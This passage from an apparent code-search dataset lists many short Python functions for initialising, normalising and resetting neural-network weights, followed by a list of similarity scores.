normalize_weights(self, w):\n n = w.astype(np.float64, copy=True)\n c = float(np.sum(w))\n n /= c\n return n", "def forward(self, x, mask):\n for layer in self.layers:\n x = layer(x, mask)\n return self.norm(x)", "def _setWeights(self):\r\n for layer in self.layer_names:\r\n raw_w = getattr(self, f'{layer}_raw')\r\n self.module._parameters[layer] = F.dropout(raw_w, p=self.weight_pro, training=self.training)", "def remove_norms(self):\n dev = next(self.parameters()).device\n for name, module in self.named_modules():\n try:\n nn.utils.remove_spectral_norm(module, name='weight_hh_l0')\n print(\"Removed spectral norm from {}\".format(name))\n except:\n pass\n try:\n nn.utils.remove_spectral_norm(module, name='weight_hh_l0_reverse')\n print(\"Removed spectral norm from {}\".format(name))\n except:\n pass\n try:\n nn.utils.remove_weight_norm(module)\n print(\"Removed wnorm from {}\".format(name))\n except:\n pass\n self.to(device=dev)", "def train(self, mode=True, freeze_bn=False):\n super(WideResNet, self).train(mode)\n self.freeze_bn = freeze_bn\n if self.freeze_bn:\n print(\"Freezing Mean/Var of BatchNorm2D.\")\n print(\"Freezing Weight/Bias of BatchNorm2D.\")\n if self.freeze_bn:\n for m in self.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n m.weight.requires_grad = False\n m.bias.requires_grad = False", "def forward(self, x, mask):\n \"Pass the input (and mask) through each layer in turn\"\n for layer in self.layers:\n x = layer(x, mask)\n return self.norm(x)", "def weight_norm(module, name=\"weight\", dim=0):\n WeightNorm.apply(module, name, dim)\n return module", "def _init_weights(self):\n nn.init.xavier_normal_(self.out.weight)", "def normalize(self):\n norm_val = self.sum2/self.sum1\n self.sum1=0\n\n for sentence in self.data_set:\n sentence.weight *= norm_val\n self.sum1 += sentence.weight", "def init_weights(net):\n for m in net.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n nn.init.xavier_uniform_(m.weight)\n # nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n return net", "def filter_normalize_(self, ref_point: 'ModelParameters', order=2):\n for l in range(len(self.parameters)):\n # normalize one-dimensional bias vectors\n if len(self.parameters[l].size()) == 1:\n self.parameters[l] *= (ref_point.parameters[l].norm(order) / self.parameters[l].norm(order))\n # normalize two-dimensional weight vectors\n for f in range(len(self.parameters[l])):\n self.parameters[l][f] *= ref_point.filter_norm((l, f), order) / (self.filter_norm((l, f), order))", "def update_weights(self):\n\n self.weights -= self.loss_grads\n self.loss_grads = np.zeros(self.weights.shape)", "def initialize(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n nn.init.xavier_normal_(m.weight)\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)", "def init_weights(self, module):\n if isinstance(module, (torch.nn.Linear, torch.nn.Embedding, torch.nn.LayerNorm)):\n module.weight.data.normal_(mean=0.0, std=self.initializer_range)\n if isinstance(module, (torch.nn.Linear, torch.nn.LayerNorm)) and module.bias is not None:\n module.bias.data.zero_()", "def reset_all_weights(model: nn.Module) -> None:\n\n @torch.no_grad()\n def weight_reset(m: nn.Module):\n # - 
check if the current module has reset_parameters & if it's callabed called it on m\n reset_parameters = getattr(m, \"reset_parameters\", None)\n if callable(reset_parameters):\n m.reset_parameters()\n\n # Applies fn recursively to every submodule see: https://pytorch.org/docs/stable/generated/torch.nn.Module.html\n model.apply(fn=weight_reset)", "def update_layers(self):\n\n # Para cada layer atualiza utilizando o gradiente descendente e o learning rate\n for layer in self.layers:\n layer.update_layer(self.learning_rate)", "def weights_init(mod):\n classname = mod.__class__.__name__\n if classname.find('Conv') != -1:\n mod.weight.data.normal_(0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n mod.weight.data.normal_(1.0, 0.02)\n mod.bias.data.fill_(0)", "def init_weights(self):\n\n params = torch.load(self.resnet_weight)\n\n self.fc1.weight.data = params['state_dict']['module.fc.weight'].clone()\n self.fc1.bias.data = params['state_dict']['module.fc.bias'].clone()\n\n\n r = np.sqrt(1.) / np.sqrt(self.fc3.in_features +\n self.fc3.out_features)\n self.fc3.weight.data.uniform_(-r, r)\n self.fc3.bias.data.fill_(0)\n r = np.sqrt(1.) / np.sqrt(self.fc2.in_features +\n self.fc2.out_features)\n self.fc2.weight.data.uniform_(-r, r)\n self.fc2.bias.data.fill_(0)\n r = np.sqrt(1.) / np.sqrt(self.fc4.in_features +\n self.fc4.out_features)\n self.fc4.weight.data.uniform_(-r, r)\n self.fc4.bias.data.fill_(0)", "def spectral_norm_parallel(self):\n weights = {}\n for l in self.all_conv_layers:\n weight = l.weight_normalized\n weight_mat = weight.view(weight.size(0), -1)\n if weight_mat.shape not in weights:\n weights[weight_mat.shape] = []\n weights[weight_mat.shape].append(weight_mat)\n loss = 0\n for i in weights:\n weights[i] = torch.stack(weights[i], dim=0)\n with torch.no_grad():\n num_iter = self.num_power_iter\n if i not in self.sr_u:\n num_w, row, col = weights[i].shape\n self.sr_u[i] = F.normalize(torch.ones(num_w, row).normal_(0, 1), dim=1, eps=0.001)\n self.sr_v[i] = F.normalize(torch.ones(num_w, col).normal_(0, 1), dim=1, eps=0.001)\n num_iter = 10 * self.num_power_iter\n for j in range(num_iter):\n self.sr_v[i] = F.normalize(torch.matmul(self.sr_u[i].unsqueeze(1), weights[i]).squeeze(1), dim=1, eps=0.001)\n self.sr_u[i] = F.normalize(torch.matmul(weights[i], self.sr_v[i].unsqueeze(2)).squeeze(2), dim=1, eps=0.001)\n sigma = torch.matmul(self.sr_u[i].unsqueeze(1), torch.matmul(weights[i], self.sr_v[i].unsqueeze(2)))\n loss += torch.sum(sigma)\n return loss", "def normalize_weight(self, Z):\n self.weight /= Z", "def init_weights(self):\n for i in range(5):\n default_init_weights(getattr(self, f'conv{i+1}'), 0.1)", "def initialize_weights(self):\n weights_initializer.WeightsInitializer.initialize_layer_or_model(\n self._batch)", "def update_weights(self):\n activation, activation_p = self.feedforward()\n # initialize delta_weights\n delta_w = np.zeros(2)\n # simultaneous calculate delta_weights\n for i, element in enumerate(self.y):\n delta_w += (activation[i]-element)*(activation_p[i])*self.X[i]\n # update weight\n self.weights -= self.alfa*delta_w", "def normalise(self):\n total = 0\n for feat_set in self.values():\n for value in feat_set.values():\n total += value\n norm = 1/total\n for feat_set in self.values():\n for feat in feat_set:\n feat_set[feat] *= norm\n return self", "def _init_norm(self, weights):\n from tensorflow.python.ops.linalg_ops import norm\n with variable_scope.variable_scope('init_norm'):\n flat = array_ops.reshape(weights, [-1, self.layer_depth])\n return 
array_ops.reshape(norm(flat, axis=0), (self.layer_depth,))", "def _init_norm(self, weights):\n from tensorflow.python.ops.linalg_ops import norm\n with variable_scope.variable_scope('init_norm'):\n flat = array_ops.reshape(weights, [-1, self.layer_depth])\n return array_ops.reshape(norm(flat, axis=0), (self.layer_depth,))", "def initialize_weights(self):\n tf.nest.map_structure(\n weights_initializer.WeightsInitializer.initialize_layer_or_model,\n self._layer_nest)", "def init_weights(m):\n if isinstance(m, nn.Conv2d):\n # Note that there is no bias due to BN\n fan_out = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(mean=0.0, std=math.sqrt(2.0 / fan_out))\n elif isinstance(m, nn.BatchNorm2d):\n zero_init_gamma = cfg.BN.ZERO_INIT_FINAL_GAMMA\n zero_init_gamma = hasattr(m, \"final_bn\") and m.final_bn and zero_init_gamma\n m.weight.data.fill_(0.0 if zero_init_gamma else 1.0)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n m.weight.data.normal_(mean=0.0, std=0.01)\n m.bias.data.zero_()", "def normalise(self):\n s = self._sum()\n if s != 0:\n for element, value in self.focals.items():\n self.focals[element] /= s", "def weights_init(m):\n if (\n isinstance(m, nn.Linear)\n or isinstance(m, nn.EmbeddingBag)\n or isinstance(m, nn.Embedding)\n or isinstance(m, SparseLinear)\n ):\n nn.init.xavier_normal_(m.weight)", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def reset_model(model):\n\n\tfor layer in model.layers:\n\t\t# Note: these are custom depending on the layer type\n\t\tif '.MoleculeConv' in str(layer):\n\t\t\tW_inner = layer.init_inner((layer.inner_dim, layer.inner_dim))\n\t\t\tb_inner = np.zeros((1, layer.inner_dim))\n\t\t\t# Inner weights\n\t\t\tlayer.W_inner.set_value((T.tile(W_inner, (layer.depth + 1, 1, 1)).eval() + \\\n\t\t\t\tinitializations.uniform((layer.depth + 1, layer.inner_dim, layer.inner_dim)).eval()).astype(np.float32))\n\t\t\tlayer.b_inner.set_value((T.tile(b_inner, (layer.depth + 1, 1, 1)).eval() + \\\n\t\t\t\tinitializations.uniform((layer.depth + 1, 1, layer.inner_dim)).eval()).astype(np.float32))\n\n\t\t\t# Outer weights\n\t\t\tW_output = layer.init_output((layer.inner_dim, layer.units), scale = layer.scale_output)\n\t\t\tb_output = np.zeros((1, layer.units))\n\t\t\t# Initialize weights tensor\n\t\t\tlayer.W_output.set_value((T.tile(W_output, (layer.depth + 1, 1, 1)).eval()).astype(np.float32))\n\t\t\tlayer.b_output.set_value((T.tile(b_output, (layer.depth + 1, 1, 1)).eval()).astype(np.float32))\n\t\t\tlogging.info('graphFP layer reset')\n\n\t\telif '.Dense' in str(layer):\n\t\t\tlayer.W.set_value((layer.init(layer.W.shape.eval()).eval()).astype(np.float32))\n\t\t\tlayer.b.set_value(np.zeros(layer.b.shape.eval(), dtype=np.float32))\n\t\t\tlogging.info('dense layer reset')\n\n\t\telif '.Dropout' in str(layer):\n\t\t\tlogging.info('dropout unchanged')\n\t\telse:\n\t\t\traise ValueError('Unknown layer {}, cannot reset weights'.format(str(layer)))\n\tlogging.info('Reset model 
weights')\n\treturn model", "def init_weights(self) -> None:\n nn.init.kaiming_normal_(self._U)\n nn.init.kaiming_normal_(self._W)\n nn.init.kaiming_normal_(self._V)\n\n nn.init.normal_(self._b)", "def init_weights(m):\n if isinstance(m, nn.Conv2d):\n # Note that there is no bias due to BN\n fan_out = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(mean=0.0, std=np.sqrt(2.0 / fan_out))\n elif isinstance(m, nn.BatchNorm2d):\n zero_init_gamma = cfg.BN.ZERO_INIT_FINAL_GAMMA\n zero_init_gamma = hasattr(m, \"final_bn\") and m.final_bn and zero_init_gamma\n m.weight.data.fill_(0.0 if zero_init_gamma else 1.0)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n m.weight.data.normal_(mean=0.0, std=0.01)\n m.bias.data.zero_()", "def normalization(channels):\n return GroupNorm32(32, channels)", "def forward_propagate(self):\n for i in range(0, len(self.output_layer)):\n output = 0\n\n # Loop through each Neuron in the hidden layer\n for neuron in self.hidden_layer:\n output += neuron.weights[i] * neuron.output\n\n # Update summation for output classifier\n self.output_layer[i] = output", "def weights_init_normal(m):\r\n if isinstance(m, nn.Conv2d):\r\n m.weight.data.normal_(0.0, 0.02)\r\n elif isinstance(m, nn.BatchNorm2d):\r\n m.weight.data.normal_(1.0, 0.02)\r\n m.bias.data.fill_(0)", "def model_normalize_(self, ref_point: 'ModelParameters', order=2):\n for parameter in self.parameters:\n parameter *= (ref_point.model_norm(order) / self.model_norm())", "def weights_init(m):\n if(type(m) == nn.ConvTranspose2d or type(m) == nn.Conv2d):\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n elif(type(m) == nn.BatchNorm2d):\n nn.init.normal_(m.weight.data, 1.0, 0.02)\n nn.init.constant_(m.bias.data, 0)", "def weights_init(m):\n if(type(m) == nn.ConvTranspose2d or type(m) == nn.Conv2d):\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n elif(type(m) == nn.BatchNorm2d):\n nn.init.normal_(m.weight.data, 1.0, 0.02)\n nn.init.constant_(m.bias.data, 0)", "def apply_weights(self):\n return self.X.dot(self.get_weights())", "def extract_weights(self, name):\n\n # Extract weights\n weight_layer = (self.merged_model).get_layer(name)\n weights = weight_layer.get_weights()[0]\n\n # Normalize\n # weights = weights / np.linalg.norm(weights, axis = 1).reshape((-1, 1))\n return weights", "def normalize_all(self):\n #for i, vector in enumerate(self.real_vectors):\n # self.real_vectors[i] /= np.linalg.norm(vector)\n self.vectors /= np.linalg.norm(self.vectors, axis=1).reshape(-1,1)\n for i, vector in enumerate(self.real_vectors):\n vector.set(self.vectors[i])", "def normalize_weights(self, labels, weights):\n if self._ragged:\n labels, _, weights, _ = utils.ragged_to_dense(labels, None, weights)\n return self._normalize_weights_impl(labels, weights)", "def normalizeWeights(self):\n\n\t\t# Normalizing crossover and mutation handler weights, result is a CDF\n\t\ttotal = sum(self.mutation_handlers_weights)\n\t\tcumsum = 0\n\t\tfor i in range(len(self.mutation_handlers_weights)):\n\t\t\tcumsum += self.mutation_handlers_weights[i]\n\t\t\tself.mutation_handlers_weights[i] = cumsum/total\n\t\ttotal = sum(self.crossover_handlers_weights)\n\t\tcumsum = 0\n\t\tfor i in range(len(self.crossover_handlers_weights)):\n\t\t\tcumsum += self.crossover_handlers_weights[i]\n\t\t\tself.crossover_handlers_weights[i] = cumsum/total", "def update_network(self, a, batch_size):\n for layer in self.layers:\n layer.weights_update(a, self.alpha, self.l2_lambda, batch_size)\n a = layer.a", "def init_weights(self):\n # Initialize 
weights\n self.apply(self._init_weights)", "def remove_norms(model: \"SqueezeWave\") -> \"SqueezeWave\":\n squeeze_wave = model\n for i, wn_layer in enumerate(squeeze_wave.wn_layers):\n squeeze_wave.wn_layers[i] = WN.remove_norms(wn_layer)\n return squeeze_wave", "def apply_batch_normalization(self, layer):\n if type(layer) is not BatchNormalization:\n raise ValueError('The `layer` must be neoml.Dnn.BatchNormalization.')\n\n self._internal.apply_batch_normalization(layer._internal)", "def normalize(w: torch.Tensor):\n\n if w.dim() > 1:\n return _matrix(w)\n\n return _vector(w)", "def init_weights(self, leveledinit: bool, kernel_size: int, bias: bool) -> None:\n if leveledinit:\n nn.init.normal_(self.conv1d.weight, std=1e-3)\n nn.init.normal_(self.conv1d.bias, std=1e-6)\n with torch.no_grad():\n self.conv1d.weight[:, 0, :] += 1.0 / kernel_size\n else:\n nn.init.xavier_uniform_(self.conv1d.weight)\n\n if self.embed in (\"pre\", \"post\"):\n nn.init.xavier_uniform_(self.embedding.weight)", "def normalize_layer(tensor, name, norm_use='bn'):\n if norm_use == \"gn\":\n x = GroupNorm(name=name + 'gn', groups=32)(tensor)\n elif norm_use == \"bn\":\n x = tf.keras.layers.BatchNormalization(axis=-1, name=name + 'bn', epsilon=1.001e-5)(tensor)\n elif norm_use == \"rbn\":\n x = tf.keras.layers.BatchNormalization(axis=-1, name=name + 'rbn', epsilon=1.001e-5, renorm=True)(tensor)\n elif norm_use == \"in\":\n x = InstanceNormalization(axis=-1, name=name + 'in')(tensor)\n else:\n x = tensor\n return x", "def _initialize_weights(self):\n for _, cell in self.cells_and_names():\n if isinstance(cell, nn.Conv2d):\n cell.weight.set_data(orthogonal(cell.weight.shape, 0.6))\n if cell.bias is not None:\n cell.bias.set_data(\n init.initializer(init.Constant(0.01), cell.bias.shape,\n cell.bias.dtype))", "def reset_weights(self):\n self.policy_backbone.reset_weights()\n self.value_backbone.reset_weights()\n self.action_head.reset_weights()\n self.critic_head.reset_weights()", "def init_weights(m: Union[torch.nn.Conv3d, torch.nn.BatchNorm3d]) -> None:\n import torch\n if isinstance(m, torch.nn.Conv3d):\n torch.nn.init.normal_(m.weight, 0, 0.01)\n elif isinstance(m, torch.nn.BatchNorm3d):\n torch.nn.init.constant_(m.weight, 1)\n torch.nn.init.constant_(m.bias, 0)", "def _init_layers(self) -> None:\n self.self_attn = MultiheadAttention(**self.self_attn_cfg)\n self.cross_attn = MultiheadAttention(**self.cross_attn_cfg)\n self.embed_dims = self.self_attn.embed_dims\n self.ffn = FFN(**self.ffn_cfg)\n norms_list = [\n build_norm_layer(self.norm_cfg, self.embed_dims)[1]\n for _ in range(3)\n ]\n self.norms = ModuleList(norms_list)" ]
[ "0.71430475", "0.71430475", "0.71430475", "0.713435", "0.70688635", "0.70688635", "0.7052796", "0.7049518", "0.70298177", "0.68070155", "0.6778134", "0.676388", "0.6760103", "0.67364126", "0.6710347", "0.6696243", "0.65825963", "0.65547544", "0.6525561", "0.6517765", "0.6516343", "0.6463633", "0.6456279", "0.6439273", "0.6430638", "0.64223105", "0.6402939", "0.6390908", "0.63742155", "0.6366158", "0.6364587", "0.6356202", "0.6342152", "0.6339702", "0.633855", "0.6310263", "0.62981975", "0.62981975", "0.6297412", "0.6296653", "0.6286622", "0.6278941", "0.62722856", "0.62707883", "0.626703", "0.62638384", "0.62167066", "0.6195221", "0.6187014", "0.6180172", "0.61320746", "0.61239886", "0.61221564", "0.6121268", "0.61152345", "0.6097673", "0.608591", "0.6067848", "0.60626745", "0.60571706", "0.60425234", "0.60304576", "0.60136944", "0.6012409", "0.6010371", "0.60073864", "0.60073864", "0.6004825", "0.599004", "0.59846157", "0.59776944", "0.5965587", "0.5965587", "0.59547967", "0.59537125", "0.5950786", "0.59504676", "0.59488785", "0.5942756", "0.5940839", "0.5939532", "0.5939532", "0.5938894", "0.59365904", "0.59081244", "0.59048456", "0.59005886", "0.5899809", "0.58890074", "0.5888346", "0.5884531", "0.58824086", "0.5872415", "0.5871111", "0.58604205", "0.5859741", "0.5856319", "0.5854553" ]
0.73182416
0
Load csv data into pandas
def load_data(filename): # Load the necessary columns from the csv into pandas data = pd.read_csv(filename, sep=';') # Cleans the data data = data[["Perioden", "Regio's",\ "Kerkelijke gezindte/Geen kerkelijke gezindte (% van de bevolking)",\ "Kerkelijke gezindte/Totaal kerkelijke gezindte (% van de bevolking)",\ "Kerkelijke gezindte/Rooms-Katholiek (% van de bevolking)",\ "Kerkelijke gezindte/Protestantse Kerk in Nederland (% van de bevolking)",\ "Kerkelijke gezindte/Nederlands Hervormd (% van de bevolking)",\ "Kerkelijke gezindte/Gereformeerd (% van de bevolking)",\ "Kerkelijke gezindte/Islam (% van de bevolking)",\ "Kerkelijke gezindte/Overige gezindte (% van de bevolking)"]] # Creates new columns for renaming purposes data["Year"] = data["Perioden"] data["Region"] = data["Regio's"] data["Athiest"] = data["Kerkelijke gezindte/Geen kerkelijke gezindte (% van de bevolking)"] data["Total"] = data["Kerkelijke gezindte/Totaal kerkelijke gezindte (% van de bevolking)"] data["Roman Catholic"] = data["Kerkelijke gezindte/Rooms-Katholiek (% van de bevolking)"] data["Protestant"] = data["Kerkelijke gezindte/Protestantse Kerk in Nederland (% van de bevolking)"] data["Dutch Reformed"] = data["Kerkelijke gezindte/Nederlands Hervormd (% van de bevolking)"] data["Reformed"] = data["Kerkelijke gezindte/Gereformeerd (% van de bevolking)"] data["Islam"] = data["Kerkelijke gezindte/Islam (% van de bevolking)"] data["Other"] = data["Kerkelijke gezindte/Overige gezindte (% van de bevolking)"] # Deletes doubles data.drop(data.columns[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]], axis = 1, inplace=True) data = data.set_index("Region") print(data) return data
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def data_from_csv(self, filepath):\n self.dataframe = pd.load_csv(filepath, separator='')", "def load_data(csv_path):\n df = pd.read_csv(csv_path)\n return df", "def _parse_csv(csv_file: str) -> pd.DataFrame:\n return pd.read_csv(csv_file, header=0)", "def load_from_csv(path, delimiter=','):\n return pd.read_csv(path,encoding = \"ISO-8859-1\",dtype=object)", "def import_data(csv_file):\n # skips bad lines\n data = pd.read_csv(csv_file, error_bad_lines=False)\n return data", "def read_csv_data(csv_path):\n\n return pd.read_csv(csv_path, sep=',', engine='python')", "def csv_to_df(self, path=None):\n # reads the csv file and puts it to the dataframe\n df = pd.read_csv(path)\n return df", "def load_csv():\n df = pd.read_csv(datafolder+filename, decimal=decimal).astype(\n {'min': 'float', 'max': 'float'})\n return df", "def from_csv(self, path_to_load):\n import pandas as pd\n\n df = pd.read_csv(path_to_load)\n df = df.loc[:, ~df.columns.str.contains('^Unnamed')] # Remove unnnamed\n\n self.results['cids'] = list()\n self.results['differences'] = list()\n self.results['experimental_values'] = list()\n\n pd_dict = df.to_dict()\n length = len(pd_dict['cids'])\n for cid in [pd_dict['cids'][i] for i in range(0, length)]:\n self._results['cids'].append(cid)\n for cid in [pd_dict['differences'][i] for i in range(0, length)]:\n self._results['differences'].append(cid)\n for cid in [pd_dict['experimental_values'][i]\n for i in range(0, length)]:\n self._results['experimental_values'].append(cid)", "def _csv_to_df(csv_path, headers):\n\n # Assume all columns are strings\n columns_types = {i: str for i, header in enumerate(headers)}\n\n temp_df = pd.read_csv(csv_path, converters=columns_types, skip_blank_lines=False)\n # TODO: check that there are only two columns of type string, then convert to our format\n temp_df.columns = headers\n # Add the column split, this is all training data\n temp_df['annotation_unit_id'] = None\n return temp_df", "def from_csv(self,path):\n self.csv_path = path\n\n try:\n fh = open(self.csv_path, \"r\")\n except IOError:\n print(\"Error: no such file or directory\") \n\n self.csv_dataframe = pd.DataFrame(pd.read_csv(self.csv_path, header=0, keep_default_na=False)).dropna(axis=0, how='any')\n test = pd.DataFrame(pd.read_csv(self.csv_path)).dropna(axis=0, how='any')\n types = [0 for i in range(len(test.dtypes))]\n a = fh.readline()\n a = a[:-1] # remove '\\n'\n x = a.split(',') # x stores the name of each column\n fh.close()\n\n #type transformation\n for i in range(len(test.dtypes)):\n if test.dtypes[i].name[0:3] == 'int' or test.dtypes[i].name[0:5] == 'float':\n if (x[i][0] == \"'\" or x[i][0] == '\"'):\n x[i] = x[i].replace('\\'', '').replace('\"', '')\n for j in test[x[i]]:\n if not (j == 0 or (j > 1000 and j < 2100)):\n types[i] = test.dtypes[i].name[0:5]\n break\n else:\n types[i] = 'year'\n elif test.dtypes[i].name[0:6] == 'object':\n if (x[i][0] == \"'\" or x[i][0] == '\"'):\n x[i] = x[i].replace('\\'', '').replace('\"', '')\n for j in test[x[i]]:\n if j != 0 and not(re.search(r'\\d+[/-]\\d+[/-]\\d+', j)):\n types[i] = 'varchar'\n break\n else:\n types[i] = 'date'\n \n name = path.rsplit('/', 1)[-1][:-4]\n self.table_info(name, x, types)\n self.import_method = methods_of_import[2] # = 'csv'\n\n self.show_csv_info()", "def importData(filename):\r\n data = pd.read_csv(filename)\r\n return data", "def read_data_from_csv(filename):\n df = pd.read_csv(filename)\n return df", "def read_csv(path):\n return pd.read_csv(path)", "def read_csv(csv_path):\n \n df = 
pd.read_csv(csv_path)\n\n return df", "def _load_csv_into_df(csv_file: Any, csv_name: str) -> pd.DataFrame:\n try:\n df = pd.read_csv(csv_file, sep=\"|\", header=0, dtype=str, encoding=\"UTF-8\")\n except ValueError as e:\n print(f\"ERROR! Could not read the file {csv_name}: {e}\")\n raise\n return df", "def _load_stored_csv(path: Union[Path, str]) -> Union[pd.DataFrame, pd.Series]:\n data = pd.read_csv(path, index_col=0, parse_dates=[0]).round(12)\n data.index = data.index.tz_convert(REFERENCE_TZ)\n return data", "def read_csv():", "def csv_loader(csv_file):\n df = pd.read_csv(csv_file, sep=';', parse_dates=['Data_Alteraçao'])\n pd.set_option('display.float_format', '{:.0f}'.format)\n\n df = df.fillna(0)\n df = df.drop(columns=['Cod. Pareamento', 'Cod. UF', 'Sigla UF', 'Cod. Subarea',\n 'Nome Subarea', 'Cod. Municipio', 'Nome Municipio', 'Codigo Agencia',\n 'Nome Agencia', 'Cod. Setor', 'Cod. Logradouro CNEFE',\n 'Tipo Logradouro CNEFE', 'Titulo Logradouro CNEFE',\n 'Nome Logradouro CNEFE', 'Nome Tratado CNEFE', 'Tipo Logradouro DNE',\n 'Titulo Logradouro DNE', 'Nome Logradouro DNE', 'Nome Tratado DNE',\n 'Logradouro Completo DNE', 'Distancia', 'Cod. Match', 'Motivo Match',\n 'CEPs Face', 'Localidade Face',\n 'Alterar Logradouro para DNE?', 'Observaçao', 'SIAPE Alteração',\n 'Nome Alteraçao', 'Data_Alteraçao', 'Status', 'Unnamed: 33'])\n\n # df.astype({'CEP Logradouro CNEFE': 'int32'}).dtypes\n\n df['CEP'] = df['CEP'].str.replace(' ', '', regex=False)\n\n ceps_dne = []\n for index, row in df.iterrows():\n if type(row.CEP) == str:\n for cep in row.CEP.split(','):\n # print(index, cep)\n ceps_dne.append(int(cep))\n\n ceps_cnefe = df['CEP Logradouro CNEFE'].astype(int).tolist()\n ceps = ceps_dne + ceps_cnefe\n ceps = list(set(ceps))\n return pd.Series(ceps)", "def loadData(path):\n try:\n return pd.read_csv(path)\n except Exception as e:\n raise Exception(\"Could not read df, possbily incorrect path: {}\".format(e))", "def load_data(file_path):\n data = pandas.read_csv(file_path)\n\n return data", "def load_csv(self):\n self.database = pd.read_csv(\n self.settings['database_path'],\n encoding='utf-8')", "def read_from_csv(path):\n if not os.path.exists(path):\n return None\n if not path.endswith('.csv'):\n return None\n\n with open(path, 'r') as file:\n data = pd.read_csv(file, header=0)\n\n return data", "def load_data_csv():\r\n \r\n # Load lookup table\r\n path = 'data/id_lookup.csv'\r\n lookup_table = pd.read_csv(path, index_col=0)\r\n\r\n # Load song data\r\n path2 = 'data/data_lyrics_features.csv'\r\n data = pd.read_csv(path2, index_col=0)\r\n\r\n return data, lookup_table", "def _loadCSVFile(self):\n self._df = pd.read_csv(\n self._pathfile, sep=CSV_SEPARATOR, index_col=CSV_INDEX_COL)", "def import_data(catalog='xmatch_TGAS_Simbad.csv', params=None, nrows=None, delimiter=','):\n print \"Loading %s and creating DataFrame..\" % catalog\n df_imported = pd.read_csv(catalog, delimiter=delimiter, header=0, usecols=params, nrows=nrows)\n print \"..Done\\n----------\"\n return df_imported", "def read_csv(self) -> None:\n\n self._df = pd.read_csv(self._dataset_file)", "def read_data(path):\n data = pd.read_csv(path)\n return data", "def read_data(path):\n data = pd.read_csv(path)\n return data", "def get_csv_data(csv_path: str, img_dir: str) -> pd.DataFrame:\r\n data = pd.read_csv(csv_path)\r\n data['title'] = data['title'].apply(preprocess_titles)\r\n data['image'] = data['image'].apply(abs_path, args=(img_dir,))\r\n return data", "def read_data(filepath):\n df = pd.read_csv(filepath)\n 
return df", "def read_data(filepath):\n df = pd.read_csv(filepath)\n return df", "def read_data(filepath):\n df = pd.read_csv(filepath)\n return df", "def from_csv(self, path):\n for model, table in [(self.Dataset, 'dataset'),\n (self.Datarun, 'datarun'),\n (self.Hyperpartition, 'hyperpartition'),\n (self.Classifier, 'classifier')]:\n df = pd.read_csv(os.path.join(path, '%ss.csv' % table))\n\n # parse datetime columns. This is necessary because SQLAlchemy can't\n # interpret strings as datetimes on its own.\n # yes, this is the easiest way to do it\n for c in inspect(model).attrs:\n if type(c) != ColumnProperty:\n continue\n col = c.columns[0]\n if type(col.type) == DateTime:\n df[c.key] = pd.to_datetime(df[c.key],\n infer_datetime_format=True)\n\n for _, r in df.iterrows():\n # replace NaN and NaT with None\n for k, v in list(r.iteritems()):\n if pd.isnull(v):\n r[k] = None\n\n # insert the row into the database\n create_func = getattr(self, 'create_%s' % table)\n create_func(**r)", "def load(self):\n data = pandas.read_csv(self.path, names=self.names)\n return data", "def _get_df_from_csv(self, filename):\n df = pd.read_csv(filename)\n df.set_index('Date', drop=True, inplace=True)\n df.index = pd.to_datetime(df.index)\n return df", "def create_dataframe_from_csv(path_to_csv_file):\r\n df = pd.read_csv(path_to_csv_file)\r\n return df", "def get_data(path):\n df = pd.read_csv(path)\n\n return df", "def read_data_from_csv(filename: str) -> pd.DataFrame:\n try:\n data = pd.read_csv(filename)\n return data\n except(FileNotFoundError):\n print('Error: Could not read the data from csv.')\n return None", "def _read_csv(self) -> pd.DataFrame:\n\n return pd.concat(\n [\n pd.read_csv(f, usecols=[1, 2, 3, 4, 5])\n for f in self.temp_path.iterdir()\n if f.name.endswith(\".csv\")\n ]\n )", "def read_data_csv(path):\n df = pd.read_csv(path)\n df.drop([\"Unnamed: 0\"], axis=1, inplace=True)\n return df", "def import_data():\n\tif os.path.exists(\"log.csv\"):\n\t\t#print (\"--training data imported to data frame\\n\")\n\t\tdf = pd.read_csv(\"log.csv\", index_col=0)\n\telse:\n\t\tprint(\"training CSV not found\")\n\t\texit()\n\t\n\treturn df", "def load_data(filepath):\n\tlogging.info(f\"Load data from {filepath}\")\n\tdf = pd.read_csv(filepath)\n\tdf = set_dtypes(df)\n\tdf = df.sort_values(by='query_date')\n\n\treturn df", "def load_data(fn):\n return pandas.read_csv(fn, dtype={'Name': str, 'Reason': str, 'Amount': float, 'Day': int})", "def load(self, path):\n self.df = pd.read_csv(path)\n print(\"Loaded data from {}\".format(path))", "def _csv2df(data_file):\n df = pd.read_csv(data_file, encoding=\"ISO-8859-1\", low_memory=False)\n return df", "def load_from_csv(self):\n\n self._logger.info('Reading data coming from CSV files')\n\n sta = self.stations\n\n if sta != None:\n msta = \", \".join(sta)\n self._logger.debug('Using only stations {0}'.format(msta))\n\n # load the 